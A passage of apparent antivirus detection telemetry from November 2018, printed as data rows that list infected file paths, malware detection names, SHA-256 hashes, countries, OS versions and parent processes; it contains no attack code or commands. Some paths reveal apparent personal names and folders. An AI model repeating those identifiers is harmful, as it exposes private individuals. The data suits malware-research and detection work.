  Row(detection=Row(filename='avscan-20181102-165644-58eaf2ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e64cb28\\AVSCAN-20181102-162959-7940ACA9\\AVSCAN-20181102-165644-58EAF2CA', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:56:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='woqtdkpg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\wOqTdkPg.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124013-69a45ecc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-123256-410908D6\\AVSCAN-20181102-124013-69A45ECC', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064500-f5a73e5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e98bdcaa\\AVSCAN-20181102-064437-F1CC38C1\\AVSCAN-20181102-064500-F5A73E5E', filesize=1152000, name='HEUR/AGEN.1003473.#M1.#R1'), hash='ab714e78737ba53201a68a9f9ded01d000461639d6734181706052fdf5eba21a', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jabo_direct3d8.dll', filepath='C:\\Users\\X\\Documents\\WinDS PRO Apps\\windsproapps\\app\\Project64_21\\Plugin\\GFX\\Jabo_Direct3D8.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='e410c8b2fae7da037e26e4ce0622495fa96279197f7a87ea774fbbf4d7bd0f24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T04:20:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082530-a69ff1c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39da4c56\\AVSCAN-20181102-081849-75C61544\\AVSCAN-20181102-082530-A69FF1C5', filesize=128000, name='Adware/RedCap.c000bb.#M1.#R1'), hash='c000bb574a63c938b2b515fca3c76eeec39d0c196e18c9b527685d5cc89b9ad6', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='htccalc.exe', filepath='E:\\Program Files\\Volcano Team\\VolcanoBox\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='b16a7a4ce90fc171865e7f21d412477e5e67e9c536b079fa05ff370cad3ce05e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:57:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T10:07:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194723-1005119e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72e4470\\AVSCAN-20181102-194642-0BCADECE\\AVSCAN-20181102-194723-1005119E', filesize=1600000, name='TR/Crypt.CFI.Gen.#M1.#R1'), hash='a8504fe17a19d3eefd1a43c116c9e6913de878d72a2f96cb02876be404e0adcf', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='саитова м.м.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Саитова М.М\\Саитова М.М.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:53:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:51:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:45:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='system volume information                                                                                           .exe', filepath='E:\\System Volume Information                                                                                           .exe', filesize=0, name='WORM/Autorun.hfp.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T14:55:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='council members.exe', filepath='F:\\council members\\council members.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d7b8d7bb76ec3f3f271e272cf71a07c23ee5c036c1373b67c4bafed4746a1dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D7B8D7BB76EC3F3F271E272CF71A07C23EE5C036C1373B67C4BAFED4746A1DD', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='8d7b8d7bb76ec3f3f271e272cf71a07c23ee5c036c1373b67c4bafed4746a1dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mappe concettuali.exe', filepath='\\\\ts-xelcea\\share\\ROBERTO\\Roberto\\programmi\\mappe concettuali.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='9d5474ab118826102c3fcb29558ce07cda47e87bd27d0f3ecbeda8f171b07faa', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-053309-17671189', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_02a7a7b9\\AVSCAN-20181103-053049-0C0ECA2C\\AVSCAN-20181103-053309-17671189', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:33:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0112093.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0112093.exe', filesize=192000, name='W32/Viking.AT.#M1.#R1'), hash='e018890c01134389ad718d1060fab0af08bd9d10b374fb7b6e66b4b2e9d0fb35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ney0fu11qpd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541057577.5bdaac2937ddf', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Backs\\660598731.exe', parentsize=671232, timestamp='2018-11-02T03:49:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085428-fae94234', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-085428-FAE94234', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194602-3ea72822', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e39cb12a\\AVSCAN-20181102-152842-30860B0F\\AVSCAN-20181102-194602-3EA72822', filesize=28000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='f26912fbf9ec31f8c0366b1d913484a11668680e1cf962e37f6da284d7fbfec8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:46:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:10:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114945-1415af60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8231814a\\AVSCAN-20181104-112930-403F88DF\\AVSCAN-20181104-114945-1415AF60', filesize=2112000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='f050ff3fee0b12748742d97310dbb48b0b2d9af3646631d8dd0c871105a0f785', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:49:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b199', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b199', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d9952fadc5c646678a30a6b3c3afee30a38890a7c80f1e5dede1cf834b605991', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T14:26:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='fb41ab85b19b1cb4e15a36676a7da2963928e51e4152078a0d20e8a4dc4d33b6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e54c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e54c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:58:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b0469e6812e239a47caef5a5e475244e2d101c572bedfdebad412bb855409143', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B0469E6812E239A47CAEF5A5E475244E2D101C572BEDFDEBAD412BB855409143', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b0469e6812e239a47caef5a5e475244e2d101c572bedfdebad412bb855409143', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202453-d25a5852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202453-D25A5852', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144150-b6b986aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-144150-B6B986AA', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:41:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c9b2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c9b2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:37:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ade012c4275bb7ed3281760e03b3de2e2bcd53e2b81361f68a3a45f4363b7d1c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\ADE012C4275BB7ED3281760E03B3DE2E2BCD53E2B81361F68A3A45F4363B7D1C', filesize=2560000, name='Worm/Ngrbot.adwm.#M1.#R1'), hash='ade012c4275bb7ed3281760e03b3de2e2bcd53e2b81361f68a3a45f4363b7d1c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:13:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ranviewer.exe', filepath='C:\\Users\\X\\Desktop\\Ran FIle\\cyz reborn\\SRC\\_bin\\release_d\\RanViewer.exe', filesize=2560000, name='HEUR/AGEN.1005627.#M1.#R1'), hash='f2a0be2f6863b11b9196f23ab3f9dd550844d579567b13c3003d2e27ad941e47', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T12:41:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='serial.exe', filepath='C:\\Program Files\\aBusinessPlus\\SERIAL.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='ea102d93e8dc6ba57074ba13208d652b38148aff1e605dfe7454f396ed549e3d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Um2X48RDlki+nyXY.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-04T11:16:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T07:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T04:56:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154313-533400a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-154250-4E8D2EB1\\AVSCAN-20181101-154313-533400A5', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:43:19Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='jkh.open.info.doc.warm.xls', filepath='E:\\FreeFiles\\Женя\\рабочий стол\\повторно загруженные\\JKH.OPEN.INFO.DOC.WARM.xls', filesize=1856000, name='W97M/Agent.4231.#M1.#R1'), hash='1e21e8e58c0739de40264d755183cc1b607b20080e4cc7db80c349a2836cf130', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104144-290ec1bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed6475cc\\AVSCAN-20181102-102215-7882B57A\\AVSCAN-20181102-104144-290EC1BF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:00:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobe-acrobat-reader-dc-.exe', filepath='G:\\مجلد جديد \u202b\u202c\\مجلد جديد \u202b\u202c\\adobe-acrobat-reader-dc-.exe', filesize=928000, name='PUA/InstallCore.Gen7.#M300.#R603246'), hash='6976626276c05d700d044506aca86ff3c3bd27fe009e89ebd2c866e9a34784cf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2088160, timestamp='2018-11-02T16:31:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ff5d685ddf30aa8399b22626da95c80e5019d9c513ff044df8ded8de1297b5b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5FF5D685DDF30AA8399B22626DA95C80E5019D9C513FF044DF8DED8DE1297B5B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ff5d685ddf30aa8399b22626da95c80e5019d9c513ff044df8ded8de1297b5b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msinfo32.exe', filepath='C:\\Windows\\System32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:38:43Z'), dt=datetime.date(2018, 11, 2)),
